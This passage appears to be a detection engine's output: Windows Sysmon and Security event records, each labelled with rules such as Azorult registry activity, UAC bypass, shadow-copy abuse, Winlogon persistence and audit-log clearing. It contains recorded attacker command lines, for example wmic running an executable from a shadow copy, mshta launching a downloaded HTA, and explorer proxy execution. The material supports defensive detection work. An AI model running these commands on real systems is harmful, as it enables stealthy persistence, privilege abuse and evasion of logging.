System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 17:20:49.261"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16513,"Execution_attributes":{"ProcessID":2012,"ThreadID":300},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T17:20:49.443464Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\cmd.exe","ProcessGuid":"6661D424-EC73-5EFE-0000-00109FEA6300","ProcessId":6292,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-2190595668-4244358899-639490025-500\\\\Device\\HarddiskVolume4\\Windows\\explorer.exe","UtcTime":"2020-07-03 09:05:58.257"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"win10.ecorp.com","Correlation":null,"EventID":13,"EventRecordID":400701,"Execution_attributes":{"ProcessID":1444,"ThreadID":3796},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-03T09:05:58.276333Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Explorer Root Flag Process Tree Break","Proxy Execution Via Explorer.exe"],"event":{"Event":{"EventData":{"CommandLine":"explorer.exe /root,\"c:\\windows\\System32\\calc.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\Administrator.ECORP\\","Description":"Windows Explorer","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=59AB8548708342C77C51F70EEC5CED0A88DC4701,MD5=6A65873EA949C5CCC72DDEF9E9780AA5,SHA256=16656BBB748BA1C811BB2C68D987DC0F5CAF149E41A84E45F6B6ECAAF7D29AB2,IMPHASH=0B98A47B3DAF2EE45939EF2A0F188959","Image":"C:\\Windows\\explorer.exe","IntegrityLevel":"High","LogonGuid":"6661D424-948B-5EEF-0000-002072300F00","LogonId":"0xf3072","OriginalFileName":"EXPLORER.EXE","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"6661D424-EC73-5EFE-0000-00109FEA6300","ParentProcessId":6292,"ProcessGuid":"6661D424-F4F6-5EFE-0000-0010E7EFF800","ProcessId":6860,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"ECORP\\Administrator","UtcTime":"2020-07-03 09:05:58.268"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"win10.ecorp.com","Correlation":null,"EventID":1,"EventRecordID":400702,"Execution_attributes":{"ProcessID":1444,"ThreadID":3796},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-07-03T09:05:58.278154Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\svchost.exe","ProcessGuid":"6661D424-9438-5EEF-0000-00104DA20000","ProcessId":792,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-2190595668-4244358899-639490025-500\\\\Device\\HarddiskVolume4\\Windows\\explorer.exe","UtcTime":"2020-07-03 09:05:58.319"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"win10.ecorp.com","Correlation":null,"EventID":13,"EventRecordID":400703,"Execution_attributes":{"ProcessID":1444,"ThreadID":3796},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-03T09:05:58.364162Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"00000000-0000-0000-0000-000000000000","ProcessId":6860,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-2190595668-4244358899-639490025-500\\\\Device\\HarddiskVolume4\\Windows\\explorer.exe","UtcTime":"2020-07-03 09:05:58.547"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"win10.ecorp.com","Correlation":null,"EventID":13,"EventRecordID":400707,"Execution_attributes":{"ProcessID":1444,"ThreadID":3796},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-03T09:05:58.619637Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\System32\\calc.exe","ProcessGuid":"6661D424-F4F6-5EFE-0000-0010C00AF900","ProcessId":3224,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-2190595668-4244358899-639490025-500\\\\Device\\HarddiskVolume4\\Windows\\System32\\win32calc.exe","UtcTime":"2020-07-03 09:05:58.707"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"win10.ecorp.com","Correlation":null,"EventID":13,"EventRecordID":400708,"Execution_attributes":{"ProcessID":1444,"ThreadID":3796},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-03T09:05:58.737753Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami /groups ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-7B40-5CEC-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"cmd.exe /c whoami /groups ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-FE66-5CEB-0000-001058F50B00","ParentProcessId":3256,"ProcessGuid":"365ABB72-FE66-5CEB-0000-0010C7F80B00","ProcessId":1168,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-05-27 15:12:38.270"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":6170,"Execution_attributes":{"ProcessID":980,"ThreadID":2220},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-27T15:12:38.290374Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Shadow Copies Creation Using Operating Systems Utilities"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\wbem\\wmic.exe /output:C:\\Windows\\TEMP\\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create \"ClientAccessible\", \"C:\\\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"WMI Commandline Utility","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-7B40-5CEC-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe /output:C:\\Windows\\TEMP\\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create \"ClientAccessible\", \"C:\\\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-FE6F-5CEB-0000-0010F4370C00","ParentProcessId":3448,"ProcessGuid":"365ABB72-FE6F-5CEB-0000-0010D33A0C00","ProcessId":3344,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-05-27 15:12:47.456"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":6182,"Execution_attributes":{"ProcessID":980,"ThreadID":2220},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-27T15:12:47.478285Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious WMI Execution","Shadow Copies Creation Using Operating Systems Utilities"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\wbem\\wmic.exe process call create \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy7\\\\Windows\\Temp\\svhost64.exe ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"WMI Commandline Utility","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-7B40-5CEC-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe process call create \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy7\\\\Windows\\Temp\\svhost64.exe ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-FE76-5CEB-0000-0010546E0C00","ParentProcessId":2356,"ProcessGuid":"365ABB72-FE76-5CEB-0000-001077710C00","ProcessId":2840,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-05-27 15:12:54.515"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":6190,"Execution_attributes":{"ProcessID":980,"ThreadID":2220},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-27T15:12:54.544664Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Script Execution From Temp Folder"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\mshta.exe\" \"C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S97WTYG7\\update.hta\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Microsoft (R) HTML Application host","FileVersion":"11.00.9600.16428 (winblue_gdr.131013-1700)","Hashes":"SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A","Image":"C:\\Windows\\System32\\mshta.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-98E4-5D04-0000-0020A4350100","LogonId":"0x135a4","ParentCommandLine":"\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" C:\\Users\\IEUser\\Downloads\\update.html","ParentImage":"C:\\Program Files\\Internet Explorer\\iexplore.exe","ParentProcessGuid":"365ABB72-9972-5D04-0000-0010F0490C00","ParentProcessId":3660,"ProcessGuid":"365ABB72-9AA6-5D04-0000-00109C850F00","ProcessId":652,"Product":"Internet Explorer","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-06-15 07:13:42.278"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":7648,"Execution_attributes":{"ProcessID":2044,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-06-15T07:13:42.294109Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Rundll32 Without Parameters"],"event":{"Event":{"EventData":{"CommandLine":"rundll32.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-0A6F-5D1D-0000-0020CA350100","LogonId":"0x135ca","ParentCommandLine":"\"C:\\Windows\\system32\\notepad.exe\" ","ParentImage":"C:\\Windows\\System32\\notepad.exe","ParentProcessGuid":"365ABB72-1256-5D1D-0000-0010FB1A1B00","ParentProcessId":1632,"ProcessGuid":"365ABB72-1282-5D1D-0000-0010DD401B00","ProcessId":2328,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-07-03 20:39:30.254"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":8352,"Execution_attributes":{"ProcessID":112,"ThreadID":2084},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-03T20:39:30.254733Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - User added to interesting group"],"event":{"Event":{"EventData":{"MemberName":"-","MemberSid":"S-1-5-21-3461203602-4096304019-2269080069-501","PrivilegeList":"-","SubjectDomainName":"MSEDGEWIN10","SubjectLogonId":"0x27a10f","SubjectUserName":"IEUser","SubjectUserSid":"S-1-5-21-3461203602-4096304019-2269080069-1000","TargetDomainName":"Builtin","TargetSid":"S-1-5-32-544","TargetUserName":"Administrators"},"System":{"Channel":"Security","Computer":"MSEDGEWIN10","Correlation_attributes":{"ActivityID":"15957A0B-7182-0000-A07A-95158271D501"},"EventID":4732,"EventRecordID":191029,"Execution_attributes":{"ProcessID":624,"ThreadID":4452},"Keywords":"0x8020000000000000","Level":0,"Opcode":0,"Provider_attributes":{"Guid":"54849625-5478-4994-A5BA-3E3B0328C30D","Name":"Microsoft-Windows-Security-Auditing"},"Security":null,"Task":13826,"TimeCreated_attributes":{"SystemTime":"2019-09-22T11:22:05.201727Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - User added to interesting group"],"event":{"Event":{"EventData":{"MemberName":"-","MemberSid":"S-1-5-20","PrivilegeList":"-","SubjectDomainName":"MSEDGEWIN10","SubjectLogonId":"0x27a10f","SubjectUserName":"IEUser","SubjectUserSid":"S-1-5-21-3461203602-4096304019-2269080069-1000","TargetDomainName":"Builtin","TargetSid":"S-1-5-32-544","TargetUserName":"Administrators"},"System":{"Channel":"Security","Computer":"MSEDGEWIN10","Correlation_attributes":{"ActivityID":"15957A0B-7182-0000-A07A-95158271D501"},"EventID":4732,"EventRecordID":191030,"Execution_attributes":{"ProcessID":624,"ThreadID":5108},"Keywords":"0x8020000000000000","Level":0,"Opcode":0,"Provider_attributes":{"Guid":"54849625-5478-4994-A5BA-3E3B0328C30D","Name":"Microsoft-Windows-Security-Auditing"},"Security":null,"Task":13826,"TimeCreated_attributes":{"SystemTime":"2019-09-22T11:23:19.251925Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"DC1.insecurebank.local","Correlation":null,"EventID":1102,"EventRecordID":203050,"Execution_attributes":{"ProcessID":744,"ThreadID":768},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-05-08T03:00:11.778188Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"insecurebank","SubjectLogonId":"0x218b896","SubjectUserName":"administrator","SubjectUserSid":"S-1-5-21-738609754-2819869699-4189121830-500"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"DC1.insecurebank.local","Correlation":null,"EventID":1102,"EventRecordID":198242566,"Execution_attributes":{"ProcessID":744,"ThreadID":3396},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-03-25T21:28:11.073626Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"insecurebank","SubjectLogonId":"0x8d7099","SubjectUserName":"bob","SubjectUserSid":"S-1-5-21-738609754-2819869699-4189121830-1108"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-06-14 22:22:21.503","Image":"C:\\Users\\IEUser\\Downloads\\a.exe","ProcessGuid":"365ABB72-1E19-5D04-0000-0010DFC60A00","ProcessId":4020,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\9QxTsAU9w8gyPj4w\\BRE6BgE2JubB.exe","UtcTime":"2019-06-14 22:22:21.503"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":7531,"Execution_attributes":{"ProcessID":1960,"ThreadID":288},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-06-14T22:22:21.503995Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"\"C:\\Users\\IEUser\\AppData\\Roaming\\9QxTsAU9w8gyPj4w\\BRE6BgE2JubB.exe\",explorer.exe","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Downloads\\a.exe","ProcessGuid":"365ABB72-1E19-5D04-0000-0010DFC60A00","ProcessId":4020,"RuleName":"Persistence - Winlogon Shell","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell","UtcTime":"2019-06-14 22:22:21.519"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":7532,"Execution_attributes":{"ProcessID":1960,"ThreadID":288},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-06-14T22:22:21.535245Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["WMI Modules Loaded"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"WMI","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=03DC8ABDF9C9948FE6E783DCA9C6C8264D635F0A,MD5=5610B0425518D185331CB8E968D060E6,SHA256=E235186C3BF266EE9EC733D2CFF35E3A65DE039C19B14260F4054F34B5E8AD41,IMPHASH=523D1DB34FC36465E35F6201A2FD561B","Image":"C:\\Users\\IEUser\\Downloads\\a.exe","ImageLoaded":"C:\\Windows\\System32\\wbem\\wmiutils.dll","ProcessGuid":"365ABB72-1E1D-5D04-0000-001003E70A00","ProcessId":1008,"Product":"Microsoft® Windows® Operating System","RuleName":"Execution - Suspicious WMI module load","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-06-14 22:22:31.925"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":7,"EventRecordID":7536,"Execution_attributes":{"ProcessID":1960,"ThreadID":1916},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-06-14T22:22:31.957120Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Logon Scripts (UserInitMprLogonScript)","Suspicious Userinit Child Process"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Users\\IEUser\\AppData\\Roaming\\9QxTsAU9w8gyPj4w\\BRE6BgE2JubB.exe\"","Company":"","CurrentDirectory":"C:\\Windows\\system32\\","Description":"NpmTaskRunner","FileVersion":"1.0.0.0","Hashes":"SHA1=E2286C233467D0E164ED5ED1D07BAC9F90F74D19,MD5=41CE32C0D1D4E5BB8C63674F317450EF,SHA256=5DE788D23B247B29F116CD0583280CE10A429E9F8C1D80C42DEAB20C6F4DBB4E,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Users\\IEUser\\AppData\\Roaming\\9QxTsAU9w8gyPj4w\\BRE6BgE2JubB.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-1E4A-5D04-0000-002013C00B00","LogonId":"0xbc013","ParentCommandLine":"C:\\Windows\\system32\\userinit.exe","ParentImage":"C:\\Windows\\System32\\userinit.exe","ParentProcessGuid":"365ABB72-1E51-5D04-0000-00104C340C00","ParentProcessId":3448,"ProcessGuid":"365ABB72-1E51-5D04-0000-00107B380C00","ProcessId":3444,"Product":"NpmTaskRunner","RuleName":"","TerminalSessionId":2,"User":"IEWIN7\\IEUser","UtcTime":"2019-06-14 22:23:13.925"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":7556,"Execution_attributes":{"ProcessID":1960,"ThreadID":288},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-06-14T22:23:13.957120Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["WMI Modules Loaded"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"WMI","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=03DC8ABDF9C9948FE6E783DCA9C6C8264D635F0A,MD5=5610B0425518D185331CB8E968D060E6,SHA256=E235186C3BF266EE9EC733D2CFF35E3A65DE039C19B14260F4054F34B5E8AD41,IMPHASH=523D1DB34FC36465E35F6201A2FD561B","Image":"C:\\Users\\IEUser\\AppData\\Roaming\\9QxTsAU9w8gyPj4w\\BRE6BgE2JubB.exe","ImageLoaded":"C:\\Windows\\System32\\wbem\\wmiutils.dll","ProcessGuid":"365ABB72-1E54-5D04-0000-0010B7B30C00","ProcessId":1724,"Product":"Microsoft® Windows® Operating System","RuleName":"Execution - Suspicious WMI module load","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-06-14 22:23:26.811"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":7,"EventRecordID":7563,"Execution_attributes":{"ProcessID":1960,"ThreadID":288},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-06-14T22:23:26.811612Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\regedit.exe","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-8DEC-5F00-0000-0010F0460800","ProcessId":5128,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.reg\\OpenWithList\\b","UtcTime":"2020-07-04 